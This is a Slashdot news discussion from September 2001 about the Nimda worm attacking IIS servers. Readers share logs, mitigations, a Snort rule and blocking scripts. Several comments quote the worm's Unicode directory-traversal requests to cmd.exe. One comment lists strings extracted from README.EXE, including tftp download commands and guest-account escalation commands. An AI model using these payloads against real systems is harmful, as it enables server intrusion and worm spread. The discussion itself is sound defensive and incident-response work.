Slashdot Log In
New (More) Annoying Microsoft Worm Hits Net
from the what-a-pain-in-the-arse dept.
Here are examples of the requests it's sending:
GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../
..%c1%1c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
While writing this story I was hit a total of 4 times, 16 GET attempts per attack. In only 4 minutes. Also of interest, My desktop has now been hit about 500 times today, all from 208.x.x.x IPs. This might be really bad. I still haven't read anything about this anywhere else, so you heard it here first ;)
Update Web servers compromised by this worm apparently attach a "readme.eml" to all web pages served... and due to a bug in IE5, it will automatically execute the file! Yay Internet Explorer!
Is this just the old Unicode exploit? (Score:4, Interesting)
Looks like an exploit that's been around for a while (way before CR)
Ask them for /etc/passwd!! (Score:5, Funny)
Bleah...my firewall logs all of this... (Score:4, Informative)
It's not like @Home (in my area) is doing *anything* to stop this. I really think that they should be policing for such disruptive activities and informing their customers when unsecured machines on their network are comprimised.
Re:Bleah...my firewall logs all of this... (Score:4, Funny)
Duh! Flipping back and forth between the sites, Slashdot, ssh, answering the phone and guzzling coffee, I didn't notice that IE was crashing, Norton antivirus was triggering... shit.
I'm an idiot. Okay - have I infected my machine? I'm afraid I've been automatically triggering 'readme.eml'. I'm running NT4.0 sp6.
408 worm too? (Score:5, Informative)
I checked one of the IPs and it said 'Fuck USA Government, Fuck PoisonBOx' and opened a second window with what looked like a MIME buffer overflow attempt. I run Opera on Linux so it didn't effect me. It looks like we may be getting hit in a shotgun approach. My systems are in the 207.227 range and 208.
Brian
'Fuck USA' is sadmind (Score:4, Insightful)
More at:
http://www.symantec.com/avcenter/venc/data/backdo
Wrong name (Score:4, Informative)
Re:Wrong name (Score:5, Funny)
I was surfing some porn sites this morning and they seemed horribly affected (none of the images would load and they were slow as hell).
ugh. Just when you thought it was safe to disable "assholes_log".
Re:Wrong name (Score:5, Informative)
If you try to access a vulnerable server it attempts to send you a 'readme.eml' file with a
Re:How to stop Internet Explorer executing said wa (Score:4, Insightful)
[message/rfc822]
So this thing is really evil:
1. it uses many forms of attack
2. it attacks server _and_ clients
3. it propagates by tftping the load from altering hosts (probably from the host which
did the attack before)
4. it alters the content type for the client infection via http+IE
here's more output (Score:4, Informative)
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 281
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:05 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 305
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:06 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/syst em32/cmd.exe?/c+dir HTTP/1.0" 404 322
www.iitelecom.qc.ca - - [18/Sep/2001:08:10:07 -0700] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c 1%1c../..%c1%1c../winnt/system32/cmd.
Re:here's more output (Score:4, Informative)
Assuming that refers to this:
then that's an exploit for Code Red II [f-secure.com] infected machines, not the original Code Red.
Re:yup! (Score:4, Informative)
Wrong way:
Service Pack 6A
IIS cumulative rollup patch
Post SP6A security rollup patch
Right way:
Service Pack 6a
Post-SP6a Security Roll-up
IIS Cumulative Patch
We thought we were covered. Nope. :-(
(reference, focus-ms mailing list)
What's the problem? (Score:5, Funny)
"You have new mail, you open it. Your server begins port scanning every box on the internet. Do the server's mind? Of course not, they have nothing better to do." - New Microsoft Ad?
It looks like Code Blue from here (Score:3, Informative)
Outlook Express 6.0 can prevent spread (Score:5, Informative)
Here is how it is done:
Tools>Options>Security>check "Do not allow attchments to be saved or opened that could potentially be a virus"
Re:Outlook Express 6.0 can prevent spread (Score:4, Interesting)
Actually, it is such a stupid check, it almost makes things worse instead.
Too Slow (Score:3, Informative)
~~~~~~~~~~~~~
Many ISPs, including [ISP], are under attack by a new worm that appears to be related to the recent CodeRed worm. This worm attacks Microsoft web servers via a known vulnerability and seeks to replicate itself by searching for other vulnerable servers.
The traffic caused by this worm has caused severe network problems worlwide this morning (18 Sep 2001) according to many ISP-related mailing lists. More information will be sent to this announcement list as it becomes available.
~~~~~~~~~~~~~
OK, so they say it's a Code-Redish bug. According to Taco's post, it's not even close (sort of).
I'm using *NIX/Apache.
I'm not gonna worry about this one (yet again...). Y'all with them damn Win boxes keeping the Internet flooded with this sort of junk, PLEASE either shut of your machines, or get a real OS...
(or at least, apply the damn patch already)
Yep, we're seeing them here too. (Score:5, Informative)
Evidence from compromised boxes elsewhere on campus seems to indicate that this bug will create a ton of *.eml files on the computer and they are all about 78k. Wehaven't received an .eml file in hand yet, to view the contents. A variety of .eml files are created, including "desktop.eml",
"readme.eml", etc.
A compromised system will attach a readme.eml file to the bottom of all web pages served. This is because there is currently a bug [guninski.com] out for IE5 that will auto execute any given .eml file.
Damn...just submitted this story... (Score:3, Informative)
Anyways here's the sequence of attempts it makes, trying to capitalize on old worms that weren't cleaned up properly, as well as known unicode exploits.
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:19 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:20 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
2001-09-18 15:10:21 *.*.*.* GET
Furthermore every attacking system was in the same 255.0.0.0/8 as the target system so it appears to target in the same "Class A" address (of course in this case it's 216.x.x.x so it's not really Class A, but you get the point).
More Info (Score:5, Informative)
I'll take a look at Admin.dll later today.
Worm Un-named no longer (Score:5, Informative)
w32.nimda.amm
Info FromRuss at BugTraq (Score:5, Interesting)
There have been numerous reports of IIS attacks being generated by machines over a broad range of IP addresses. These "infected" machines are using a wide variety of attacks which attempt to exploit already known and patched vulnerabilities against IIS.
It appears that the attacks can come both from email and from the network.
A new worm, being called w32.nimda.amm, is being sent around. The attachment is called README.EXE and comes as a MIME-type of "audio/x-wav" together with some html parts. There appears to be no text in this message when it is displayed by Outlook when in Auto-Preview mode (always a good indication there's something not quite right with an email.)
The network attacks against IIS boxes are a wide variety of attacks. Amongst them appear to be several attacks that assume the machine is compromised by Code Red II (looking for ROOT.EXE in the
One thing to note is the attempt to execute TFTP.EXE to download a file called ADMIN.DLL from (presumably) some previously compromised box.
Anyone who discovers a compromised machine (a machine with ADMIN.DLL in the
Also, look for TFTP traffic (UDP69). As a safeguard, consider doing the following;
edit %systemroot/system32/drivers/etc/services.
change the line;
tftp 69/udp
to;
tftp 0/udp
thereby disabling the TFTP client. W2K has TFTP.EXE protected by Windows File Protection so can't be removed.
More information as it arises.
Cheers,
Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.2
iQCVAwUBO6dmcRBh2Kw/l7p5AQHJCgQA1JHwqF5RjJX+QVM
Tm8Ujms5+6ia0tcT1qmZWJV48eHYNzV3+AyyO6Gn8ds/NVY
iycY2qnARDJP6KNmHI0bAdBUBtsnVo5P9itElIoqKbAorQj
hSW7yN2lhJc=
=YAwc
-----END PGP SIGNATURE-----
Damn it! (Score:4, Interesting)
Just when I was hoping my cable company would unblock my HTTP port (which they said was "temporary"). Unfortunately, this will give them more fuel to make it permanent.
The HTTP port doesn't bug me as much as they have also blocked my mail port.
Question for sendmail experts out there, related to this: I'm currently using another system to tunnel my mail to my box on my cable modem. It works great, but a side effect is that it looks like all mail is coming from "localhost", which defeats the anti-Spam measures. Of course, it didn't take long for the cockroaches to find my mail server and use it for relaying. I've been fighting it by blocking specific subnets, but it's an annoying battle. Any suggestions?
Snort rule (Score:3, Informative)
Add this to your in-house SnortRules file.
alert TCP $EXTERNAL_NET any -> $HOME_NET 80 (msg:"AfterRed Worm"; flags: A+; content: "/cmd.exe"; nocase;)
Coordinated DDOS? (Score:3, Interesting)
The NIPC issued the following advisory: Potential Distributed Denial of Service (DDoS) Attacks [nipc.gov] on Monday, talking about reports of people preparing for DDOS attacks on computer and commerce infrastructures. In particular: On September 12, 2001, a group of hackers named the Dispatchers claimed they had already begun network operations against information infrastructure components such as routers. The Dispatchers stated they were targeting the communications and finance infrastructures. They also predicted that they would be prepared for increased operations on or about Tuesday, September 18, 2001.
Of course, this could just be an ill-timed release of yet another worm (like there're "well-timed" releases?). I just thought that this was particularly spooky, reading this alert after seeing this worm story...
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm (Score:4, Informative)
Date: September 18, 2001
Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.
Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.
Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .
REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.
Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.
Some interesting strings from README.EXE (Score:4, Informative)
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
SYSTEM\CurrentControlSet\Services\lanmanserver\
share c$=c:\
user guest ""
localgroup Administrators guest
localgroup Guests guest
user guest
open
user guest
HideFileExt
/scripts
/MSADC
/scripts/..%255c..
/_vti_bin/..%255c../..%255c../..%255c..
/_mem_bin/..%255c../..%255c../..%255c..
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c..
/scripts/..%c0%2f..
/scripts/..%c0%af..
/scripts/..%c1%9c..
/scripts/..%%35%63..
/scripts/..%%35c..
/scripts/..%25%35%63..
/scripts/..%252f..
/root.exe?/c+
/winnt/system32/cmd.exe?/c+
net%%20use%%20\\%s\ipc$%%20""%%20/user:"guest"
tftp%%20-i%%20%s%%20GET%%20Admin.dll%%20
Admin.dll
c:\Admin.dll
d:\Admin.dll
e:\Admin.dll
window.open("readme.eml", null, "resizable=no,top=6000,left=6000")
/Admin.dll
qusery9bnow
-qusery9bnow
\mmc.exe
\riched20.dll
boot
Shell
explorer.exe load.exe -dontrunold
\system.ini
\load.exe
if you don't mind a few ipchains rules... (Score:4, Informative)
#!/bin/sh
for LUSER in `grep "winnt"
if [ ! "`ipchains -L -n | grep $LUSER`" ]
then ipchains -A input -s $LUSER -d 0/0 -j DENY
fi
done
Time for a class action lawsuit against Microsoft. (Score:4, Troll)
And before anyone starts quoting the Microsoft license, ISPs that run Linux/*BSD/Solaris are being hurt by the traffic, too. They have no license with Microsoft and they've been injured by Microsoft's negligence.
I'd like to see AOL, Earthlink, or some other big ISP take Microsoft's corporate butt to court, demanding compensatory and punitive damages for Microsoft's negligence.
Re:unmap your EML file association (Score:4, Informative)
Create a text file and name it something like eml.reg. Right click, select Edit. Paste the following lines into the file:
REGEDIT4
[HKEY_CLASSES_ROOT\.eml]
@="Microsoft Internet Mail Message"
"Content Type"="text/plain"
And save the file. Double click and it will add itself to the registry. This will re-associate the
Got a copy of readme.eml from an infected box (Score:4, Interesting)
*DO NOT OPEN IT IN INTERNET EXPLORER.*
There are currently 4 known means of propogation (Score:5, Informative)
A short summary:
The Nimda worm is now known to propogate four ways:
(1) An IIS vulnerability propagation mechanism where the worm attempts to exploit a large number of IIS vulnerabilities to gain control of a victim IIS server. Once in control, the worm uses tftp to fetch its code in a file called Admin.dll from the attacking server.
(2) Email propogation. The worm harvests email addresses from the address book and potentially the web browser history and sends itself to all addresses as an attachment called readme.exe. These executables are automatically executed if the receipient who opens (or previews) the email is running Internet Explorer 5 or 6. Note that the worm may spoof the source address on the emails.
(3) When a web server is infected, the worm replaces all web pages on the server with a binary encoded as a wav file, which can infect each client that connects to the server. The wav file is called readme.eml. Microsoft Internet Explorer 5.0 and higher will automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It will propagate to shares that are accessible to username guest with no password.
See: www.incidents.org/react/nimda.php [incidents.org] for the full details.
- YASP (Yet Another Security Professional) who is fighting this pretty heavily at work - nothing here infected, of course, but the traffic itself is threatening to become a pretty nice distributed DOS - our Internet Router (a decently-hefty CSCO 6500-series) is sitting at ~60% processor utilization.
Someone was testing this out way before September (Score:3, Interesting)
207.##.###.# - - [02/Apr/2001:03:15:00 -0700] "GET
cmd.exe?/c%20dir HTTP/1.0" 404 329
So it looks like someone was giving this one a dry run several months ago...
Jay (=
Concept (CV) Virus - Namba worm ? (Score:3, Informative)
I've received a mail, with an attached file readme.exe declared as mime format audio/x-wav.
after hexadecimal dump, i've noticed this string :
000090c0 6e 74 65 72 66 61 63 65 73 00 00 00 43 6f 6e 63 |nterfaces...Conc|
000090d0 65 70 74 20 56 69 72 75 73 28 43 56 29 20 56 2e |ept Virus(CV) V.|
000090e0 35 2c 20 43 6f 70 79 72 69 67 68 74 28 43 29 32 |5, Copyright(C)2|
000090f0 30 30 31 20 20 52 2e 50 2e 43 68 69 6e 61 00 00 |001 R.P.China..|
"Concept Virus(CV) V.5, Copyright(C)2001 R.P.China"
in the code i can found :
00009b20 2f 5f 76 74 69 5f 62 69 6e 2f 2e 2e 25 32 35 35 |/_vti_bin/..%255| 00009b30 63 2e 2e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e |c../..%255c../..|
00009b40 25 32 35 35 63 2e 2e 00 2f 5f 6d 65 6d 5f 62 69 |%255c.../_mem_bi| 00009b50 6e 2f 2e 2e 25 32 35 35 63 2e 2e 2f 2e 2e 25 32 |n/..%255c../..%2|
_vti_bin and _mem_bin are part of my apache access logs :
213.195.72.2 - - [18/Sep/2001:23:57:27 +0200] "GET
000092a0 0d 0a 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e |....|
000092b0 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 20 62 67 43 |.| 00092d0 0a 3c 69 66 72 61 6d 65 20 73 72 63 3d 33 44 63 |.....--| which is the code of the html part of the mail,
or :
00009350 37 38 39 30 44 45 46 5f 3d 3d 3d 3d 0d 0a 43 6f |7890DEF_====..Co|
00009360 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 75 64 69 |ntent-Type: audi| 00009370 6f 2f 78 2d 77 61 76 3b 0d 0a 09 6e 61 6d 65 3d |o/x-wav;...name=| 00009380 22 72 65 61 64 6d 65 2e 65 78 65 22 0d 0a 43 6f |"readme.exe"..Co| 00009390 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 |ntent-Transfer-E| 000093a0 6e 63 6f 64 69 6e 67 3a 20 62 61 73 65 36 34 0d |ncoding: base64.| 000093b0 0a 43 6f 6e 74 65 6e 74 2d 49 44 3a 20 3c 45 41 |.Content-ID:
I 3 readme.exe [audio/x-wav, base64, 75K] (mutt output) I'm not a virus expert, but if somebody is interested by the readme.exe code or more informations, please mail mglcel@gcu-squad.org. I've sent a mail to mc-afee support to learn if they know this worm, Concept(CV).
URLScan (Score:5, Informative)
Anyone know if something like this exists for Apache? A tool like this, if widespread, could effectively contain future buffer-overrun type attacks.
Corporate ought to be securing the box better... (Score:3)